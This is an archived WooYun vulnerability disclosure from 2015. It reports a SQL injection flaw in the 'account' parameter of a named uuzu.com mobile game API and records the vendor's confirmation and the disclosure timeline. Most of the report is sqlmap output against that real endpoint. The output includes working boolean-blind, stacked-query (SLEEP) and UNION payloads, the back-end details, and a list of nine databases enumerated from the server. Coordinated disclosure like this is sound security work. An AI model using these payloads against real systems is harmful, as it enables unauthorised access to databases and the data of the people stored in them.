乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-28: 细节已通知厂商并且等待厂商处理中 2015-07-28: 厂商已经确认,细节仅向厂商公开 2015-08-07: 细节向核心白帽子及相关领域专家公开 2015-08-17: 细节向普通白帽子公开 2015-08-27: 细节向实习白帽子公开 2015-09-11: 细节向公众公开
~
http://api.m.uuzu.com/?account=e&c=api&device=android&event=recharge&game_id=93&m=selectaccount 参数问题
arameter: account (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: account=e' AND 2207=2207 AND 'kRuY'='kRuY&c=api&device=android&event=recharge&game_id=93&m=select Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: account=e';(SELECT * FROM (SELECT(SLEEP(5)))MVKJ)#&c=api&device=android&event=recharge&game_id=93&m=select Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: account=-8198' UNION ALL SELECT NULL,NULL,CONCAT(0x7162787a71,0x636f744f65546b4e6c4d,0x717a6a6a71),NULL,NULL,NULL,NULL,NULL,NULL-- &c=api&device=android&event=recharge&game_id=93&m=select---web application technology: PHP 5.5.4back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: account (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: account=e' AND 2207=2207 AND 'kRuY'='kRuY&c=api&device=android&event=recharge&game_id=93&m=select Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: account=e';(SELECT * FROM (SELECT(SLEEP(5)))MVKJ)#&c=api&device=android&event=recharge&game_id=93&m=select Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: account=-8198' UNION ALL SELECT NULL,NULL,CONCAT(0x7162787a71,0x636f744f65546b4e6c4d,0x717a6a6a71),NULL,NULL,NULL,NULL,NULL,NULL-- &c=api&device=android&event=recharge&game_id=93&m=select---web application technology: PHP 5.5.4back-end DBMS: MySQL 5.0.11available databases [9]:[*] ad_android_analyze[*] ad_android_log[*] ad_ios_analyze[*] ad_ios_log[*] ad_mobile_base[*] information_schema[*] mysql[*] performance_schema[*] test
危害等级:中
漏洞Rank:8
确认时间:2015-07-28 12:15
感谢提交。
暂无